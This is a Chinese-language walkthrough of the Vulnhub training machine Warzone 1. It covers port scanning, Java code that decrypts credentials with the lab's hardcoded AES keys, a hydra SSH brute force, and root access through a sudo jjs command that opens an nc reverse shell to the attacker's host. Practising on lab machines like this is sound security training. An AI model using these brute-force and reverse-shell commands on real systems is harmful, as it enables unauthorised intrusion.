Vulnhub靶机实战-Warzone 1

声明

好好学习,天天向上

搭建

使用virtualbox打开,网络配置和我的PRESIDENTIAL文章一样,是要vmware和virtualbox互连

渗透

存活扫描,发现目标

arp-scan -l
nmap -sP 192.168.239.1/24

端口扫描

nmap -T4 -A 192.168.239.5 -p 1-65535 -oN nmap.A

Vulnhub靶机实战-Warzone 1

开启端口

21,22,5000

以匿名用户登录ftp,发现了两个文件。

note里面提示请使用jar包加密密码

Vulnhub靶机实战-Warzone 1

反编译一下jar包,用juid

http://jd.benow.ca/

windows下运行,jar包拖进去

确实是完成加密功能的代码,这个代码的入口在Main.class,通过调用AES类中的方法,进行加密,如果我们后续得到了密文,就可以在这里编写解密的函数了

Vulnhub靶机实战-Warzone 1

访问5000

http://192.168.239.5:5000

发现栅栏密码

Vulnhub靶机实战-Warzone 1

其实大概的意思就是

明文:
IWOTAAZNSRE
通过置换,加密变成:
IWO WAAZN SRE

老套路,F12查看源码,发现

Vulnhub靶机实战-Warzone 1

使用刚刚的栅栏密码解密

密密文
GA DIE UHCEETASTTRNL
解密处,栏数选3
http://www.atoolbox.net/Tool.php?Id=777
解密后
GET AUTH CREDENTIALS

Vulnhub靶机实战-Warzone 1

访问

http://192.168.239.5/get/auth/credentials

在该路径下得到加密信息

Vulnhub靶机实战-Warzone 1

username 	password
paratrooper 	GJSFBy6jihz/GbfaeOiXwtqgHe1QutGVVFlyDXbxVRo=	
specops 	mnKbQSV2k9UzJeTnJhoAyy4TqEryPw6ouANzIZMXF6Y=	
specforce 	jiYMm39vW9pTr+6Z/6SafQ==	
aquaman 	v9yjWjP7tKHLyt6ZCw5sxtktXIYm5ynlHmx+ZCI4OT4=	
commander 	2czKTfl/n519Kw5Ze7mVy4BsdzdzCbpRY8+BQxqnsYg=	
commando 	+uj9HGdnyJvkBagdB1i26M9QzsxKHUI0EFMhhfaqt2A=	
pathfinder 	eTQiiMXzrM4MkSItWUegd1rZ/pOIU0JyWlLNw2oW6oo=	
ranger 	LBN5Syc7D7Bdj7utCbmBiT7pXU+bISYj33Qzf4CmIDs=

目标:将刚刚反编译出来的各包和类,创建到eclipse中,对上述密码进行解密,组成用户名和密码字典

这里,先看看我的java project结构,以及执行结果

Vulnhub靶机实战-Warzone 1

以下是我三个类的源码,因为个别地方改了改,把private改成了public,所以,直接贴我的源码吧

Main.java

package encrypt;

import java.util.Base64;
import java.util.Scanner;

import Other.Obfuscated;
import crypto.AES;

public class Main {

    public static String decrypt(String encryptpasswd) {
        Obfuscated obs = new Obfuscated();
        AES ea = new AES(obs.getIV(), 128, obs.getKey());
        try {
            ea.cipher.init(2, ea.key, ea.iv);
            byte[] encryptbytes = Base64.getDecoder().decode(encryptpasswd);
            byte[] decryptbytes = ea.cipher.doFinal(encryptbytes);
            return new String(decryptbytes);
        } catch (Exception ex) {
            throw new RuntimeException(ex.getMessage());
        }
    }

    public static void main(String[] args) {

        while (true) {
            Scanner in = new Scanner(System.in);
            System.out.print("enter the encryptpassword to decrypt : ");
            String encryptpassword = in.nextLine();
            System.out.println("password : " + decrypt(encryptpassword));
        }

    }
}

AES.java

package crypto;

import Other.Obfuscated;
import java.security.Key;
import java.security.MessageDigest;
import java.util.Base64;
import javax.crypto.Cipher;
import javax.crypto.spec.IvParameterSpec;
import javax.crypto.spec.SecretKeySpec;

public class AES {
  public static final IvParameterSpec DEFAULT_IV = new IvParameterSpec(new byte[19]);
  
  public static final String ALGORITHM = "AES";
  
  public static final String TRANSFORMATION = "AES/CBC/PKCS5Padding";
  
  public Key key;
  
  public IvParameterSpec iv;
  
  public Cipher cipher;
  
  public AES(String key) {
    this(key, 128);
  }
  
  public AES(String key, int bit) {
    this(key, bit, null);
  }
  
  public AES(String key, int bit, String iv) {
    if (bit == 256) {
      this.key = new SecretKeySpec(getHash("SHA-256", key), "AES");
    } else {
      this.key = new SecretKeySpec(getHash("MD5", key), "AES");
    } 
    if (iv != null) {
      this.iv = new IvParameterSpec(getHash("MD5", iv));
    } else {
      this.iv = DEFAULT_IV;
    } 
    init();
  }
  
  public static byte[] getHash(String algorithm, String text) {
    try {
      return getHash(algorithm, text.getBytes("UTF-8"));
    } catch (Exception ex) {
      throw new RuntimeException(ex.getMessage());
    } 
  }
  
  public static byte[] getHash(String algorithm, byte[] data) {
    try {
      MessageDigest digest = MessageDigest.getInstance(algorithm);
      digest.update(data);
      return digest.digest();
    } catch (Exception ex) {
      throw new RuntimeException(ex.getMessage());
    } 
  }
  
  public void init() {
    try {
      this.cipher = Cipher.getInstance("AES/CBC/PKCS5Padding");
    } catch (Exception ex) {
      throw new RuntimeException(ex.getMessage());
    } 
  }
  
  public String encrypt(String str) {
    try {
      return encrypt(str.getBytes("UTF-8"));
    } catch (Exception ex) {
      throw new RuntimeException(ex.getMessage());
    } 
  }
  
  public String encrypt(byte[] data) {
    try {
      this.cipher.init(1, this.key, this.iv);
      byte[] encryptData = this.cipher.doFinal(data);
      return new String(Base64.getEncoder().encode(encryptData));
    } catch (Exception ex) {
      throw new RuntimeException(ex.getMessage());
    } 
  }
  
  public static String encryptString(String content) {
    Obfuscated obs = new Obfuscated();
    AES ea = new AES(obs.getIV(), 128, obs.getKey());
    return ea.encrypt(content);
  }
}

Obfuscated.java

package Other;

public class Obfuscated {
  public String getIV() {
    return "w4rz0n3s3cur31vv";
  }
  
  public String getKey() {
    return "w4rz0n3s3cur3k3y";
  }
}

运行后生成用户名和密码的字典,对ssh进行爆破

Vulnhub靶机实战-Warzone 1

hydra -L user.dic -P pass.dic ssh://192.168.239.5

爆破出了

commando

c0mmandosArentRea1.!

Vulnhub靶机实战-Warzone 1

ssh连接

ssh -p 22 commando@192.168.239.5

Vulnhub靶机实战-Warzone 1

上次还登录过?

看一下历史记录

history

Vulnhub靶机实战-Warzone 1

cd /home/captain
ls
cd Desktop
ls
cat user.txt

看不了,没权限看

Vulnhub靶机实战-Warzone 1

继续进入.crypt,readme.txt提醒密码就在这里,还有一段加密程序encrypt.py和.c,简单写了解密程序得到captain密码为_us3rz0ne_F1RE

从下图可以得知几条信息

1.encrypt.py是加密的代码,先使用encrypt加密,再用base64编码

2.captain的密码就是.cw文件的密文

Vulnhub靶机实战-Warzone 1

在这台虚机里估计不行,我是在我kali的python3环境中,写一个decrypt.py,把b’密文’,密文拷贝到代码中

#!/usr/bin/python3
from simplecrypt import encrypt, decrypt
import os
import base64
key = 'sekret'
text = base64.b64decode('c2MAAk1Y/hAsEsn+FasElyXvGSI0JxD+n/SCtXbHNM+1/YEU54DO0EQRDfD3wz/lrbkXEBJJJd1ylXZpi/2dopaklmG6NCAXfGKl1eWAUNU1Iw==')
passwd = decrypt(key, text)
print(passwd)

安装好对应的pip包后,运行

python3 decrypt.py

得到解密后的密码

_us3rz0ne_F1RE’

Vulnhub靶机实战-Warzone 1

su到captain后,查看刚刚没权限的txt

cd ~/Desktop/
cat user.txt

该提权了,使用sudo -l查看到了jjs命令,jjs是让javascript可以调用java,可以执行特权命令

sudo -l

kali监听6666

nc -lvvp 6666

通过jjs反弹shell

echo "Java.type('java.lang.Runtime').getRuntime().exec('/usr/bin/nc -e /bin/bash 192.168.239.7 6666')"|sudo jjs
cat /root/Desktop/root.txt

Vulnhub靶机实战-Warzone 1

总结

1.信息收集

端口发现21,22,5000

通过21,匿名登录ftp服务,发现jar包,反编译后,发现加密函数

访问5000,提示用栅栏加密,访问敏感目录发现密文,使用3栏解密后,发现目录

访问目录,发现了多个用户名和密码,密码为加密,想到刚刚的加密函数,按照加密推导出解密函数,对这些密码进行解密

2.web权限

3.shell权限

解密后,使用用户名和密码字典,对ssh进行爆破,拿到shell

4.权限维持

通过ssh进行连接

拿到flag但是不能看

5.提权

通过查看历史记录,发现加密的密文和加密算法源码,推导出解密算法代码,并进行解密解密后,初次提权,查看flag

使用sudo执行jjs命令,提到root,拿到flag

上一篇:Vulnhub靶机实战-Lazysysadmin


下一篇:Vulnhub靶机实战-HA AVENGERS ARSENAL